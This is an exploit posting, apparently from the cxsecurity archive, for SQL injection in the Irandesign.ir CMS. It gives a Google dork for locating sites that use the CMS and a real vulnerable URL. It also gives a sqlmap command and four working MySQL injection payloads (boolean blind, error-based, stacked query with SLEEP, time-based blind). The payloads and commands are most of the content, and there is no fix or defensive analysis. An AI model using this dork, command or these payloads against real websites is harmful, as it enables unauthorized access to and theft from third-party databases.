Irandesign.ir CMS SQL Injection

2021.04.20
de K0uR0sH3R (DE) de
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: SQL Injection Vulnerability Irandesign.ir # Author: K0uR0sH3R # Date: 18/04/2021 # Tested On: Kali Linux # Contact: https://t.me/BugExpose # Google Dork: intext:"طراحی سایت توسط ایران دیزاین" ---------------------------------------------------------------------------------------------------- # Vulnerable Path: http://irandesign.ir/project/show/id/15 # python3 sqlmap.py -u "http://irandesign.ir/project/show/id/15" --random-agent --dbms=mysql --no-cast --batch --- Parameter: #1* (URI) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: http://irandesign.ir:80/project/show/id/15) RLIKE (SELECT (CASE WHEN (8944=8944) THEN 15 ELSE 0x28 END))-- WIUR Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: http://irandesign.ir:80/project/show/id/15) AND GTID_SUBSET(CONCAT(0x7171716a71,(SELECT (ELT(9203=9203,1))),0x7170707871),9203)-- cGuG Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: http://irandesign.ir:80/project/show/id/15);SELECT SLEEP(5)# Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: http://irandesign.ir:80/project/show/id/15) AND (SELECT 6165 FROM (SELECT(SLEEP(5)))IcGz)-- Xbei --- # Contact: https://t.me/BugExpose , T.me/K0uR0sH3R_info , K0uR0sH3R@gmail.com


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top